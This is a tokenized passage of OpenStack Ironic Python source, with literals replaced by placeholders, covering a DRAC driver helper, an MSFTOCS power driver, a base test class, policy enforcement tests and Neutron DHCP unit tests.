( "<STR_LIT>" ) ) <EOL> if error_msgs : <EOL> msg = ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % '<STR_LIT:\n>' . join ( error_msgs ) ) <EOL> raise exception . 
InvalidParameterValue ( msg ) <EOL> port = parsed_driver_info [ '<STR_LIT>' ] <EOL> parsed_driver_info [ '<STR_LIT>' ] = utils . validate_network_port ( <EOL> port , '<STR_LIT>' ) <EOL> return parsed_driver_info <EOL> def get_drac_client ( node ) : <EOL> """<STR_LIT>""" <EOL> driver_info = parse_driver_info ( node ) <EOL> client = drac_client . DRACClient ( driver_info [ '<STR_LIT>' ] , <EOL> driver_info [ '<STR_LIT>' ] , <EOL> driver_info [ '<STR_LIT>' ] , <EOL> driver_info [ '<STR_LIT>' ] , <EOL> driver_info [ '<STR_LIT>' ] , <EOL> driver_info [ '<STR_LIT>' ] ) <EOL> return client </s>
<s> """<STR_LIT>""" <EOL> from oslo_log import log <EOL> from ironic . common import exception <EOL> from ironic . common . i18n import _ <EOL> from ironic . common . i18n import _LE <EOL> from ironic . common import states <EOL> from ironic . conductor import task_manager <EOL> from ironic . drivers import base <EOL> from ironic . drivers . modules . msftocs import common as msftocs_common <EOL> from ironic . drivers . modules . msftocs import msftocsclient <EOL> LOG = log . getLogger ( __name__ ) <EOL> POWER_STATES_MAP = { <EOL> msftocsclient . POWER_STATUS_ON : states . POWER_ON , <EOL> msftocsclient . POWER_STATUS_OFF : states . POWER_OFF , <EOL> } <EOL> class MSFTOCSPower ( base . PowerInterface ) : <EOL> def get_properties ( self ) : <EOL> """<STR_LIT>""" <EOL> return msftocs_common . get_properties ( ) <EOL> def validate ( self , task ) : <EOL> """<STR_LIT>""" <EOL> msftocs_common . parse_driver_info ( task . node ) <EOL> def get_power_state ( self , task ) : <EOL> """<STR_LIT>""" <EOL> client , blade_id = msftocs_common . get_client_info ( <EOL> task . node . driver_info ) <EOL> return POWER_STATES_MAP [ client . get_blade_state ( blade_id ) ] <EOL> @ task_manager . require_exclusive_lock <EOL> def set_power_state ( self , task , pstate ) : <EOL> """<STR_LIT>""" <EOL> client , blade_id = msftocs_common . get_client_info ( <EOL> task . node . driver_info ) <EOL> try : <EOL> if pstate == states . POWER_ON : <EOL> client . set_blade_on ( blade_id ) <EOL> elif pstate == states . POWER_OFF : <EOL> client . set_blade_off ( blade_id ) <EOL> else : <EOL> raise exception . InvalidParameterValue ( <EOL> _ ( '<STR_LIT>' ) % pstate ) <EOL> except exception . MSFTOCSClientApiException as ex : <EOL> LOG . exception ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { "<STR_LIT>" : pstate , "<STR_LIT>" : ex } ) <EOL> raise exception . PowerStateFailure ( pstate = pstate ) <EOL> @ task_manager . 
require_exclusive_lock <EOL> def reboot ( self , task ) : <EOL> """<STR_LIT>""" <EOL> client , blade_id = msftocs_common . get_client_info ( <EOL> task . node . driver_info ) <EOL> try : <EOL> client . set_blade_power_cycle ( blade_id ) <EOL> except exception . MSFTOCSClientApiException as ex : <EOL> LOG . exception ( _LE ( "<STR_LIT>" ) , <EOL> { "<STR_LIT>" : ex } ) <EOL> raise exception . PowerStateFailure ( pstate = states . REBOOT ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import os <EOL> import sys <EOL> import tempfile <EOL> import eventlet <EOL> eventlet . monkey_patch ( os = False ) <EOL> import fixtures <EOL> from oslo_config import cfg <EOL> from oslo_config import fixture as config_fixture <EOL> from oslo_log import log as logging <EOL> import testtools <EOL> from ironic . common import config as ironic_config <EOL> from ironic . common import context as ironic_context <EOL> from ironic . common import hash_ring <EOL> from ironic . objects import base as objects_base <EOL> from ironic . tests . unit import policy_fixture <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT:host>' , '<STR_LIT>' ) <EOL> logging . register_options ( CONF ) <EOL> logging . setup ( CONF , '<STR_LIT>' ) <EOL> class ReplaceModule ( fixtures . Fixture ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , new_value ) : <EOL> self . name = name <EOL> self . new_value = new_value <EOL> def _restore ( self , old_value ) : <EOL> sys . modules [ self . name ] = old_value <EOL> def setUp ( self ) : <EOL> super ( ReplaceModule , self ) . setUp ( ) <EOL> old_value = sys . modules . get ( self . name ) <EOL> sys . modules [ self . name ] = self . new_value <EOL> self . addCleanup ( self . _restore , old_value ) <EOL> class TestingException ( Exception ) : <EOL> pass <EOL> class TestCase ( testtools . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( TestCase , self ) . setUp ( ) <EOL> self . context = ironic_context . get_admin_context ( ) <EOL> test_timeout = os . environ . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> try : <EOL> test_timeout = int ( test_timeout ) <EOL> except ValueError : <EOL> test_timeout = <NUM_LIT:0> <EOL> if test_timeout > <NUM_LIT:0> : <EOL> self . useFixture ( fixtures . Timeout ( test_timeout , gentle = True ) ) <EOL> self . useFixture ( fixtures . NestedTempfile ( ) ) <EOL> self . useFixture ( fixtures . 
TempHomeDir ( ) ) <EOL> if ( os . environ . get ( '<STR_LIT>' ) == '<STR_LIT:True>' or <EOL> os . environ . get ( '<STR_LIT>' ) == '<STR_LIT:1>' ) : <EOL> stdout = self . useFixture ( fixtures . StringStream ( '<STR_LIT>' ) ) . stream <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , stdout ) ) <EOL> if ( os . environ . get ( '<STR_LIT>' ) == '<STR_LIT:True>' or <EOL> os . environ . get ( '<STR_LIT>' ) == '<STR_LIT:1>' ) : <EOL> stderr = self . useFixture ( fixtures . StringStream ( '<STR_LIT>' ) ) . stream <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , stderr ) ) <EOL> self . log_fixture = self . useFixture ( fixtures . FakeLogger ( ) ) <EOL> self . _set_config ( ) <EOL> objects_base . IronicObject . indirection_api = None <EOL> self . _base_test_obj_backup = copy . copy ( <EOL> objects_base . IronicObjectRegistry . obj_classes ( ) ) <EOL> self . addCleanup ( self . _restore_obj_registry ) <EOL> self . addCleanup ( self . _clear_attrs ) <EOL> self . addCleanup ( hash_ring . HashRingManager ( ) . reset ) <EOL> self . useFixture ( fixtures . EnvironmentVariable ( '<STR_LIT>' ) ) <EOL> self . policy = self . useFixture ( policy_fixture . PolicyFixture ( ) ) <EOL> def _set_config ( self ) : <EOL> self . cfg_fixture = self . useFixture ( config_fixture . Config ( CONF ) ) <EOL> self . config ( use_stderr = False , <EOL> fatal_exception_format_errors = True , <EOL> tempdir = tempfile . tempdir ) <EOL> self . set_defaults ( host = '<STR_LIT>' , <EOL> verbose = True ) <EOL> self . set_defaults ( connection = "<STR_LIT>" , <EOL> sqlite_synchronous = False , <EOL> group = '<STR_LIT>' ) <EOL> ironic_config . parse_args ( [ ] , default_config_files = [ ] ) <EOL> def _restore_obj_registry ( self ) : <EOL> objects_base . IronicObjectRegistry . _registry . _obj_classes = ( <EOL> self . _base_test_obj_backup ) <EOL> def _clear_attrs ( self ) : <EOL> for key in [ k for k in self . __dict__ . 
keys ( ) if k [ <NUM_LIT:0> ] != '<STR_LIT:_>' ] : <EOL> del self . __dict__ [ key ] <EOL> def config ( self , ** kw ) : <EOL> """<STR_LIT>""" <EOL> self . cfg_fixture . config ( ** kw ) <EOL> def set_defaults ( self , ** kw ) : <EOL> """<STR_LIT>""" <EOL> group = kw . pop ( '<STR_LIT>' , None ) <EOL> for o , v in kw . items ( ) : <EOL> self . cfg_fixture . set_default ( o , v , group = group ) <EOL> def path_get ( self , project_file = None ) : <EOL> """<STR_LIT>""" <EOL> root = os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT:..>' , <EOL> '<STR_LIT:..>' , <EOL> ) <EOL> ) <EOL> if project_file : <EOL> return os . path . join ( root , project_file ) <EOL> else : <EOL> return root </s>
<s> from ironic . common import policy <EOL> from ironic . tests import base <EOL> class PolicyTestCase ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_admin_api ( self ) : <EOL> creds = ( { '<STR_LIT>' : [ u'<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> for c in creds : <EOL> self . assertTrue ( policy . enforce ( '<STR_LIT>' , c , c ) ) <EOL> def test_public_api ( self ) : <EOL> creds = { '<STR_LIT>' : '<STR_LIT:True>' } <EOL> self . assertTrue ( policy . enforce ( '<STR_LIT>' , creds , creds ) ) <EOL> def test_trusted_call ( self ) : <EOL> creds = ( { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT:True>' } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] , '<STR_LIT>' : '<STR_LIT:True>' } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> for c in creds : <EOL> self . assertTrue ( policy . enforce ( '<STR_LIT>' , c , c ) ) <EOL> def test_show_password ( self ) : <EOL> creds = { '<STR_LIT>' : [ u'<STR_LIT>' ] , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertTrue ( policy . enforce ( '<STR_LIT>' , creds , creds ) ) <EOL> class PolicyTestCaseNegative ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_admin_api ( self ) : <EOL> creds = { '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> self . assertFalse ( policy . enforce ( '<STR_LIT>' , creds , creds ) ) <EOL> def test_public_api ( self ) : <EOL> creds = ( { '<STR_LIT>' : '<STR_LIT:False>' } , { } ) <EOL> for c in creds : <EOL> self . assertFalse ( policy . enforce ( '<STR_LIT>' , c , c ) ) <EOL> def test_trusted_call ( self ) : <EOL> creds = ( { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT:False>' } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] , '<STR_LIT>' : '<STR_LIT:False>' } ) <EOL> for c in creds : <EOL> self . assertFalse ( policy . 
enforce ( '<STR_LIT>' , c , c ) ) <EOL> def test_show_password ( self ) : <EOL> creds = { '<STR_LIT>' : [ u'<STR_LIT>' ] , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertFalse ( policy . enforce ( '<STR_LIT>' , creds , creds ) ) </s>
<s> import mock <EOL> from neutronclient . common import exceptions as neutron_client_exc <EOL> from neutronclient . v2_0 import client <EOL> from oslo_config import cfg <EOL> from oslo_utils import uuidutils <EOL> from ironic . common import dhcp_factory <EOL> from ironic . common import exception <EOL> from ironic . common import pxe_utils <EOL> from ironic . conductor import task_manager <EOL> from ironic . dhcp import neutron <EOL> from ironic . drivers . modules import ssh <EOL> from ironic . tests . unit . conductor import mgr_utils <EOL> from ironic . tests . unit . db import base as db_base <EOL> from ironic . tests . unit . objects import utils as object_utils <EOL> class TestNeutron ( db_base . DbTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestNeutron , self ) . setUp ( ) <EOL> mgr_utils . mock_the_extension_manager ( driver = '<STR_LIT>' ) <EOL> self . config ( <EOL> cleaning_network_uuid = '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> self . config ( enabled_drivers = [ '<STR_LIT>' ] ) <EOL> self . config ( dhcp_provider = '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> self . config ( url = '<STR_LIT>' , <EOL> url_timeout = <NUM_LIT:30> , <EOL> retries = <NUM_LIT:2> , <EOL> group = '<STR_LIT>' ) <EOL> self . config ( insecure = False , <EOL> certfile = '<STR_LIT>' , <EOL> admin_user = '<STR_LIT>' , <EOL> admin_tenant_name = '<STR_LIT>' , <EOL> admin_password = '<STR_LIT>' , <EOL> auth_uri = '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> self . node = object_utils . create_test_node ( self . context ) <EOL> self . ports = [ <EOL> object_utils . create_test_port ( <EOL> self . context , node_id = self . node . id , id = <NUM_LIT:2> , <EOL> uuid = '<STR_LIT>' , <EOL> address = '<STR_LIT>' ) ] <EOL> self . neutron_port = { '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> dhcp_factory . DHCPFactory . _dhcp_provider = None <EOL> @ mock . patch . object ( client . 
Client , "<STR_LIT>" ) <EOL> def test__build_client_with_token ( self , mock_client_init ) : <EOL> token = '<STR_LIT>' <EOL> expected = { '<STR_LIT>' : <NUM_LIT:30> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock_client_init . return_value = None <EOL> neutron . _build_client ( token = token ) <EOL> mock_client_init . assert_called_once_with ( ** expected ) <EOL> @ mock . patch . object ( client . Client , "<STR_LIT>" ) <EOL> def test__build_client_without_token ( self , mock_client_init ) : <EOL> expected = { '<STR_LIT>' : <NUM_LIT:30> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock_client_init . return_value = None <EOL> neutron . _build_client ( token = None ) <EOL> mock_client_init . assert_called_once_with ( ** expected ) <EOL> @ mock . patch . object ( client . Client , "<STR_LIT>" ) <EOL> def test__build_client_with_region ( self , mock_client_init ) : <EOL> expected = { '<STR_LIT>' : <NUM_LIT:30> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . config ( region_name = '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> mock_client_init . return_value = None <EOL> neutron . 
_build_client ( token = None ) <EOL> mock_client_init . assert_called_once_with ( ** expected ) <EOL> @ mock . patch . object ( client . Client , "<STR_LIT>" ) <EOL> def test__build_client_noauth ( self , mock_client_init ) : <EOL> self . config ( auth_strategy = '<STR_LIT>' , group = '<STR_LIT>' ) <EOL> expected = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:30> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock_client_init . return_value = None <EOL> neutron . _build_client ( token = None ) <EOL> mock_client_init . assert_called_once_with ( ** expected ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , "<STR_LIT>" ) <EOL> def test_update_port_dhcp_opts ( self , mock_client_init , mock_update_port ) : <EOL> opts = [ { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ] <EOL> port_id = '<STR_LIT>' <EOL> expected = { '<STR_LIT:port>' : { '<STR_LIT>' : opts } } <EOL> mock_client_init . return_value = None <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . provider . update_port_dhcp_opts ( port_id , opts ) <EOL> mock_update_port . assert_called_once_with ( port_id , expected ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , "<STR_LIT>" ) <EOL> def test_update_port_dhcp_opts_with_exception ( self , mock_client_init , <EOL> mock_update_port ) : <EOL> opts = [ { } ] <EOL> port_id = '<STR_LIT>' <EOL> mock_client_init . return_value = None <EOL> mock_update_port . side_effect = ( <EOL> neutron_client_exc . NeutronClientException ( ) ) <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> self . assertRaises ( <EOL> exception . FailedToUpdateDHCPOptOnPort , <EOL> api . provider . 
update_port_dhcp_opts , <EOL> port_id , opts ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_update_port_address ( self , mock_client_init , mock_update_port ) : <EOL> address = '<STR_LIT>' <EOL> port_id = '<STR_LIT>' <EOL> expected = { '<STR_LIT:port>' : { '<STR_LIT>' : address } } <EOL> mock_client_init . return_value = None <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . provider . update_port_address ( port_id , address ) <EOL> mock_update_port . assert_called_once_with ( port_id , expected ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_update_port_address_with_exception ( self , mock_client_init , <EOL> mock_update_port ) : <EOL> address = '<STR_LIT>' <EOL> port_id = '<STR_LIT>' <EOL> mock_client_init . return_value = None <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> mock_update_port . side_effect = ( <EOL> neutron_client_exc . NeutronClientException ( ) ) <EOL> self . assertRaises ( exception . FailedToUpdateMacOnPort , <EOL> api . provider . update_port_address , <EOL> port_id , address ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_dhcp ( self , mock_gnvi , mock_updo ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> opts = pxe_utils . dhcp_options_for_instance ( task ) <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . update_dhcp ( task , opts ) <EOL> mock_updo . assert_called_once_with ( '<STR_LIT>' , opts , <EOL> token = self . context . auth_token ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_dhcp_no_vif_data ( self , mock_gnvi , mock_updo ) : <EOL> mock_gnvi . 
return_value = { '<STR_LIT>' : { } , '<STR_LIT>' : { } } <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> self . assertRaises ( exception . FailedToUpdateDHCPOptOnPort , <EOL> api . update_dhcp , task , self . node ) <EOL> self . assertFalse ( mock_updo . called ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_dhcp_some_failures ( self , mock_gnvi , mock_updo ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> exc = exception . FailedToUpdateDHCPOptOnPort ( '<STR_LIT>' ) <EOL> mock_updo . side_effect = [ None , exc ] <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . update_dhcp ( task , self . node ) <EOL> mock_gnvi . assert_called_once_with ( task ) <EOL> self . assertEqual ( <NUM_LIT:2> , mock_updo . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_dhcp_fails ( self , mock_gnvi , mock_updo ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> exc = exception . FailedToUpdateDHCPOptOnPort ( '<STR_LIT>' ) <EOL> mock_updo . side_effect = [ exc , exc ] <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> self . assertRaises ( exception . FailedToUpdateDHCPOptOnPort , <EOL> api . update_dhcp , <EOL> task , self . node ) <EOL> mock_gnvi . assert_called_once_with ( task ) <EOL> self . assertEqual ( <NUM_LIT:2> , mock_updo . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( neutron . NeutronDHCPApi , '<STR_LIT>' , <EOL> autospec = True ) <EOL> @ mock . 
patch ( '<STR_LIT>' , autospec = True ) <EOL> def test_update_dhcp_set_sleep_and_ssh ( self , mock_gnvi , mock_updo , <EOL> mock_ts ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> self . config ( port_setup_delay = <NUM_LIT:30> , group = '<STR_LIT>' ) <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> task . driver . power = ssh . SSHPower ( ) <EOL> opts = pxe_utils . dhcp_options_for_instance ( task ) <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . update_dhcp ( task , opts ) <EOL> mock_ts . assert_called_with ( <NUM_LIT:30> ) <EOL> mock_updo . assert_called_once_with ( mock . ANY , '<STR_LIT>' , opts , <EOL> token = self . context . auth_token ) <EOL> @ mock . patch . object ( neutron , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( neutron . NeutronDHCPApi , '<STR_LIT>' , <EOL> autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> def test_update_dhcp_unset_sleep_and_ssh ( self , mock_gnvi , mock_updo , <EOL> mock_ts , mock_log ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> opts = pxe_utils . dhcp_options_for_instance ( task ) <EOL> task . driver . power = ssh . SSHPower ( ) <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . update_dhcp ( task , opts ) <EOL> self . assertTrue ( mock_log . warning . called ) <EOL> self . assertIn ( '<STR_LIT>' , <EOL> mock_log . warning . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> mock_ts . assert_called_with ( <NUM_LIT:15> ) <EOL> mock_updo . assert_called_once_with ( mock . ANY , '<STR_LIT>' , opts , <EOL> token = self . context . auth_token ) <EOL> @ mock . patch . object ( neutron , '<STR_LIT>' , autospec = True ) <EOL> @ mock . 
patch ( '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( neutron . NeutronDHCPApi , '<STR_LIT>' , <EOL> autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> def test_update_dhcp_set_sleep_and_fake ( self , mock_gnvi , mock_updo , <EOL> mock_ts , mock_log ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> self . config ( port_setup_delay = <NUM_LIT:30> , group = '<STR_LIT>' ) <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> opts = pxe_utils . dhcp_options_for_instance ( task ) <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . update_dhcp ( task , opts ) <EOL> mock_log . debug . assert_called_once_with ( <EOL> "<STR_LIT>" , <NUM_LIT:30> ) <EOL> mock_log . warning . assert_not_called ( ) <EOL> mock_ts . assert_called_with ( <NUM_LIT:30> ) <EOL> mock_updo . assert_called_once_with ( mock . ANY , '<STR_LIT>' , opts , <EOL> token = self . context . auth_token ) <EOL> @ mock . patch . object ( neutron , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( neutron . NeutronDHCPApi , '<STR_LIT>' , <EOL> autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> def test_update_dhcp_unset_sleep_and_fake ( self , mock_gnvi , mock_updo , <EOL> mock_log ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> opts = pxe_utils . dhcp_options_for_instance ( task ) <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . update_dhcp ( task , opts ) <EOL> mock_log . debug . assert_not_called ( ) <EOL> mock_log . warning . assert_not_called ( ) <EOL> mock_updo . assert_called_once_with ( mock . ANY , '<STR_LIT>' , opts , <EOL> token = self . context . 
auth_token ) <EOL> def test__get_fixed_ip_address ( self ) : <EOL> port_id = '<STR_LIT>' <EOL> expected = "<STR_LIT>" <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> port_data = { <EOL> "<STR_LIT:id>" : port_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> } <EOL> fake_client = mock . Mock ( ) <EOL> fake_client . show_port . return_value = { '<STR_LIT:port>' : port_data } <EOL> result = api . _get_fixed_ip_address ( port_id , fake_client ) <EOL> self . assertEqual ( expected , result ) <EOL> fake_client . show_port . assert_called_once_with ( port_id ) <EOL> def test__get_fixed_ip_address_invalid_ip ( self ) : <EOL> port_id = '<STR_LIT>' <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> port_data = { <EOL> "<STR_LIT:id>" : port_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> } <EOL> fake_client = mock . Mock ( ) <EOL> fake_client . show_port . return_value = { '<STR_LIT:port>' : port_data } <EOL> self . assertRaises ( exception . InvalidIPv4Address , <EOL> api . _get_fixed_ip_address , <EOL> port_id , fake_client ) <EOL> fake_client . show_port . assert_called_once_with ( port_id ) <EOL> def test__get_fixed_ip_address_with_exception ( self ) : <EOL> port_id = '<STR_LIT>' <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> fake_client = mock . Mock ( ) <EOL> fake_client . show_port . side_effect = ( <EOL> neutron_client_exc . NeutronClientException ( ) ) <EOL> self . assertRaises ( exception . FailedToGetIPAddressOnPort , <EOL> api . 
_get_fixed_ip_address , port_id , fake_client ) <EOL> fake_client . show_port . assert_called_once_with ( port_id ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__get_port_ip_address ( self , mock_gfia ) : <EOL> expected = "<STR_LIT>" <EOL> port = object_utils . create_test_port ( self . context , <EOL> node_id = self . node . id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> extra = { '<STR_LIT>' : <EOL> '<STR_LIT>' } , <EOL> driver = '<STR_LIT>' ) <EOL> mock_gfia . return_value = expected <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> result = api . _get_port_ip_address ( task , port , <EOL> mock . sentinel . client ) <EOL> self . assertEqual ( expected , result ) <EOL> mock_gfia . assert_called_once_with ( '<STR_LIT>' , mock . sentinel . client ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__get_port_ip_address_for_portgroup ( self , mock_gfia ) : <EOL> expected = "<STR_LIT>" <EOL> pg = object_utils . create_test_portgroup ( self . context , <EOL> node_id = self . node . id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> extra = { '<STR_LIT>' : <EOL> '<STR_LIT>' } , <EOL> driver = '<STR_LIT>' ) <EOL> mock_gfia . return_value = expected <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> result = api . _get_port_ip_address ( task , pg , <EOL> mock . sentinel . client ) <EOL> self . assertEqual ( expected , result ) <EOL> mock_gfia . assert_called_once_with ( '<STR_LIT>' , mock . sentinel . client ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__get_port_ip_address_with_exception ( self , mock_gfia ) : <EOL> expected = "<STR_LIT>" <EOL> port = object_utils . create_test_port ( self . context , <EOL> node_id = self . node . 
